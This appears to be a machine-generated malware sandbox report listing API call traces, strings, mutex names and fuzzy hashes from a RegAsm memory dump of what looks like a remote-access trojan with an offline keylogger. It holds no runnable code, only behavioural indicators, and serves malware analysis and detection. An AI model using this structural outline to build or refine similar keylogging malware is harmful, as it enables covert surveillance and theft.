                                                                                                                                                                      • Source File: 00000013.00000002.643127619.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.643112844.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.643127619.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_10000000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1414292761-0
                                                                                                                                                                      • Opcode ID: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                                                                                                                                                      • Instruction ID: 3f57ce737592ef9202bcebfaa3f65c0582e3f3231b4dd00ae19a895c9b397c34
                                                                                                                                                                      • Opcode Fuzzy Hash: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                                                                                                                                                      • Instruction Fuzzy Hash: 4F51CF72710216ABFB15CF60CC85EAB37A9FB417D0F11462AFC44D6148EB35EE509BA1
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0040A6E6
                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                                                                                                                                                                      • Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0040A729
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$CloseCreateHandleSizeSleep
                                                                                                                                                                      • String ID: XQG
                                                                                                                                                                      • API String ID: 1958988193-3606453820
                                                                                                                                                                      • Opcode ID: 3855d95cd7322452e6531401611e332563825ee2f28412b9057315d8b356c682
                                                                                                                                                                      • Instruction ID: fa029248b1ac628aedb802b18ed81a98d1a4018e107c0b234daa3009ae89debe
                                                                                                                                                                      • Opcode Fuzzy Hash: 3855d95cd7322452e6531401611e332563825ee2f28412b9057315d8b356c682
                                                                                                                                                                      • Instruction Fuzzy Hash: 96110130600740AADA31A734988961F7BA9DB45356F44483EF1866B6D3C67DDC64C71F
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CountEventTick
                                                                                                                                                                      • String ID: !D@$NG
                                                                                                                                                                      • API String ID: 180926312-2721294649
                                                                                                                                                                      • Opcode ID: 2358727b175ae872d91cb736a134ed864a84fd0a9605b5dbb089f4c020cd2242
                                                                                                                                                                      • Instruction ID: 3ac9408315e1e6036cedb879f74fb80cbd33a95067926c5a5f9e9f7d680cff10
                                                                                                                                                                      • Opcode Fuzzy Hash: 2358727b175ae872d91cb736a134ed864a84fd0a9605b5dbb089f4c020cd2242
                                                                                                                                                                      • Instruction Fuzzy Hash: 3E51A5315082019AC724FB32D852AFF73A5AF94304F50483FF54A671E2EF3C5945C68A
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,0040A2B8,?,00000000,00000000), ref: 0040A239
                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_0000A2A2,?,00000000,00000000), ref: 0040A249
                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_0000A2C4,?,00000000,00000000), ref: 0040A255
                                                                                                                                                                        • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
                                                                                                                                                                        • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateThread$LocalTimewsprintf
                                                                                                                                                                      • String ID: Offline Keylogger Started
                                                                                                                                                                      • API String ID: 465354869-4114347211
                                                                                                                                                                      • Opcode ID: e9faa5e414620fc96257d4712bcffae5cc82c2583e5401c4a4641fe0a8bebe8a
                                                                                                                                                                      • Instruction ID: fa9a7328340dc7f48b0d085764b542104813bfc3ea66268f7111ac5d0199d402
                                                                                                                                                                      • Opcode Fuzzy Hash: e9faa5e414620fc96257d4712bcffae5cc82c2583e5401c4a4641fe0a8bebe8a
                                                                                                                                                                      • Instruction Fuzzy Hash: 1111ABB12003187ED210BB368C87CBB765DDA4139CB40057FF946221C2EA795D14CAFB
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetLocalTime.KERNEL32(00000001,00474EE0,00475598,?,?,?,?,00415D11,?,00000001), ref: 00404F81
                                                                                                                                                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EE0,00475598,?,?,?,?,00415D11,?,00000001), ref: 00404FCD
                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_00005150,?,00000000,00000000), ref: 00404FE0
                                                                                                                                                                      Strings
                                                                                                                                                                      • KeepAlive | Enabled | Timeout: , xrefs: 00404F94
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Create$EventLocalThreadTime
                                                                                                                                                                      • String ID: KeepAlive | Enabled | Timeout:
                                                                                                                                                                      • API String ID: 2532271599-1507639952
                                                                                                                                                                      • Opcode ID: 7014718608cfeb48bfe47f339cac9c5a9a17279d6e1db9155cd03e2f3c9ced1b
                                                                                                                                                                      • Instruction ID: 41fa32a9fb91b1633a7afb8999ae97baef60c60c8d6252053b050d354fdafbcf
                                                                                                                                                                      • Opcode Fuzzy Hash: 7014718608cfeb48bfe47f339cac9c5a9a17279d6e1db9155cd03e2f3c9ced1b
                                                                                                                                                                      • Instruction Fuzzy Hash: 82110A71800385BAC720A7779C0DEAB7FACDBD2714F04046FF54162291D6B89445CBBA
                                                                                                                                                                      APIs
                                                                                                                                                                      • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004137B9
                                                                                                                                                                      • RegSetValueExA.KERNEL32(?,004674C8,00000000,?,00000000,00000000), ref: 004137E1
                                                                                                                                                                      • RegCloseKey.KERNEL32(?), ref: 004137EC
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseCreateValue
                                                                                                                                                                      • String ID: pth_unenc
                                                                                                                                                                      • API String ID: 1818849710-4028850238
                                                                                                                                                                      • Opcode ID: 3ae23bf51bdae044d43d0241d7839713fa8c787b67a3ee745682b35b7168c146
                                                                                                                                                                      • Instruction ID: b09b06e14e5a963f4ed757ac8f346f2723baee7be417271cc0de3610a50c6458
                                                                                                                                                                      • Opcode Fuzzy Hash: 3ae23bf51bdae044d43d0241d7839713fa8c787b67a3ee745682b35b7168c146
                                                                                                                                                                      • Instruction Fuzzy Hash: A4F06272500218FBDF00AFA1DC45DEA376CEF04751F108566FD1AA61A1DB359E14DB54
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
                                                                                                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 00404DD2
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00404DDB
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3360349984-0
                                                                                                                                                                      • Opcode ID: a7859c0859ff1460fb498f226e87523366a5d7389d1c528f14f49a7270558968
                                                                                                                                                                      • Instruction ID: 30d48123e17294c38ae6f490953f1b42a5ca81467cb0df1087f173bd09261e59
                                                                                                                                                                      • Opcode Fuzzy Hash: a7859c0859ff1460fb498f226e87523366a5d7389d1c528f14f49a7270558968
                                                                                                                                                                      • Instruction Fuzzy Hash: 684182B1108301AFC714EB62CD55DBFB7EDAFD4314F40093EF992A22E1DB3899098666
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                                                                                                                                                      • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                                                                                                                        • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                                                                                                                        • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.643127619.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.643112844.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.643127619.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_10000000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: HandleModuleProtectVirtual
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2905821283-0
                                                                                                                                                                      • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                      • Instruction ID: 210348daefc771ff09e919cc38fdfa0d839c8297c2798a32150270056baeab90
                                                                                                                                                                      • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                      • Instruction Fuzzy Hash: 0301D22094574A38BA51D7B40C06EBA5FD8DB176E0B24D756F1408619BDDA08906C3AE
                                                                                                                                                                      APIs
                                                                                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,10001D66,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue), ref: 10005D13
                                                                                                                                                                      • GetLastError.KERNEL32(?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000,00000364,?,10005BC8), ref: 10005D1F
                                                                                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000), ref: 10005D2D
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.643127619.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.643112844.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.643127619.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_10000000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3177248105-0
                                                                                                                                                                      • Opcode ID: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                                                                                                                                                      • Instruction ID: ab8c2af688280ff547417c348c7c3430721907d0b6a0cc88e9d35c15e8af339b
                                                                                                                                                                      • Opcode Fuzzy Hash: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                                                                                                                                                      • Instruction Fuzzy Hash: 59018436615732ABE7319B689C8CB4B7798EF056E2B214623F909D7158D731D801CAE0
                                                                                                                                                                      APIs
                                                                                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue), ref: 00448618
                                                                                                                                                                      • GetLastError.KERNEL32(?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000,00000364,?,00448367), ref: 00448624
                                                                                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000), ref: 00448632
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3177248105-0
                                                                                                                                                                      • Opcode ID: 8f9b5e85c90ff7ccd8dc2bf5dda10acfb836c822a6cf5ef36d60eb5c9189937f
                                                                                                                                                                      • Instruction ID: 239c22332ac31c5199b3ba4764290be2907fca328f5d1df1ca03bb1201a614b6
                                                                                                                                                                      • Opcode Fuzzy Hash: 8f9b5e85c90ff7ccd8dc2bf5dda10acfb836c822a6cf5ef36d60eb5c9189937f
                                                                                                                                                                      • Instruction Fuzzy Hash: D401FC32602322EBDB618A78EC4495F7758AF15BA2B22093AF909D3241DF24DC01C6EC
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 0041C543
                                                                                                                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C568
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0041C576
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$CloseCreateHandleReadSize
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3919263394-0
                                                                                                                                                                      • Opcode ID: eaf6ed3f63b4403b43378431095bcec12dbe7b76bb0b9555606dcebd0a0bb3a0
                                                                                                                                                                      • Instruction ID: 4673af35f3eeaf13de89ae80f5e83caf65f56e40ae5cb47f4621101913e6d1ef
                                                                                                                                                                      • Opcode Fuzzy Hash: eaf6ed3f63b4403b43378431095bcec12dbe7b76bb0b9555606dcebd0a0bb3a0
                                                                                                                                                                      • Instruction Fuzzy Hash: 50F0C2B1241318BFE6101B25ADC9EBB369DDB866A9F10063EF802A22D1DA698D055139
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateMutexA.KERNEL32(00000000,00000001,00000000,0040EC43,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660CC,00000003,00000000), ref: 0040D0B3
                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0040D0BE
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateErrorLastMutex
                                                                                                                                                                      • String ID: Rmc-0BYJUE
                                                                                                                                                                      • API String ID: 1925916568-796065600
                                                                                                                                                                      • Opcode ID: 28fa13b7b1caae5192b70daf2f30c6e0a610ddba166525727d25863cd50ab091
                                                                                                                                                                      • Instruction ID: 57749e379dff282fb0cfe370275dd79dddcb706c5168e3a31171962593876721
                                                                                                                                                                      • Opcode Fuzzy Hash: 28fa13b7b1caae5192b70daf2f30c6e0a610ddba166525727d25863cd50ab091
                                                                                                                                                                      • Instruction Fuzzy Hash: 0DD012B0605700EBDB186770ED5975839559744702F40487AB50FD99F1CBBC88908519
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                                                                                                                        • Part of subcall function 1000C7E6: GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                                                                                                                                                        • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                                                                                                                        • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.643127619.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.643112844.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.643127619.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_10000000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: HandleModuleProtectVirtual
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2905821283-0
                                                                                                                                                                      • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                      • Instruction ID: abaa11d5974e3e1b05dfd32ec0224f7ddc3d76465740e120717e363e7a178845
                                                                                                                                                                      • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                      • Instruction Fuzzy Hash: A921382140838A6FF711CBB44C05FA67FD8DB172E0F198696E040CB147DDA89845C3AE
                                                                                                                                                                      APIs
                                                                                                                                                                      • send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                                      • WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                                                                                                                                      • SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: EventObjectSingleWaitsend
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3963590051-0
                                                                                                                                                                      • Opcode ID: b1d66744df5c6cb587348be29f4f2b73cfa97db57556f8ad38e66ecf600c3840
                                                                                                                                                                      • Instruction ID: ade4869c8039bafc3f5202e75afdfb18787be874a76dce876c460fae4797ad88
                                                                                                                                                                      • Opcode Fuzzy Hash: b1d66744df5c6cb587348be29f4f2b73cfa97db57556f8ad38e66ecf600c3840
                                                                                                                                                                      • Instruction Fuzzy Hash: 152124B2900119BBCB04ABA1DC95DEEB77CFF14314B00452FF515B71E2EB38AA15C6A4
                                                                                                                                                                      APIs
                                                                                                                                                                      • VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                                                                                                                      • VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                                                                                                                      • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.643127619.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.643112844.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.643127619.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_10000000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ProtectVirtual$HandleModule
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3519776433-0
                                                                                                                                                                      • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                      • Instruction ID: 9138b94afbcae90e12a8614b592989542e7cb6e8cba5f1d72008c399686a5f74
                                                                                                                                                                      • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                      • Instruction Fuzzy Hash: B7F0C2619497893CFA21C7B40C45EBA5FCCCB276E0B249A56F600C718BDCA5890693FE
                                                                                                                                                                      APIs
                                                                                                                                                                      • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                                                                                                                                      • RegQueryValueExA.KERNEL32 ref: 00413622
                                                                                                                                                                      • RegCloseKey.KERNEL32(?), ref: 0041362D
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseOpenQueryValue
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3677997916-0
                                                                                                                                                                      • Opcode ID: 6d7bb055a41a46af3afbf88891c67b332a8db22587d044117d184b09d82707ea
                                                                                                                                                                      • Instruction ID: 0661f39b514c0023b6096d8878825bbc81d19e8e8981dfb5b132c5fecbfe39b6
                                                                                                                                                                      • Opcode Fuzzy Hash: 6d7bb055a41a46af3afbf88891c67b332a8db22587d044117d184b09d82707ea
                                                                                                                                                                      • Instruction Fuzzy Hash: 4A01D676900228FBCB209B91DC08DEF7F7DDB44B51F004066BB05A2240DA748E45DBA4
                                                                                                                                                                      APIs
                                                                                                                                                                      • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 0041374F
                                                                                                                                                                      • RegQueryValueExA.KERNEL32 ref: 00413768
                                                                                                                                                                      • RegCloseKey.KERNEL32(00000000), ref: 00413773
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseOpenQueryValue
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3677997916-0
                                                                                                                                                                      • Opcode ID: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                                                                                                                                                                      • Instruction ID: cdc8bb2f12cdea1da97e3e4d454c68039a4c25ad8704162e95ac064a0ac82555
                                                                                                                                                                      • Opcode Fuzzy Hash: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                                                                                                                                                                      • Instruction Fuzzy Hash: C301AD7540022DFBDF215F91DC04DEB3F38EF05761F008065BE09620A1E7358AA5EB94
                                                                                                                                                                      APIs
                                                                                                                                                                      • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004135A4
                                                                                                                                                                      • RegQueryValueExA.KERNEL32 ref: 004135C2
                                                                                                                                                                      • RegCloseKey.KERNEL32(?), ref: 004135CD
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
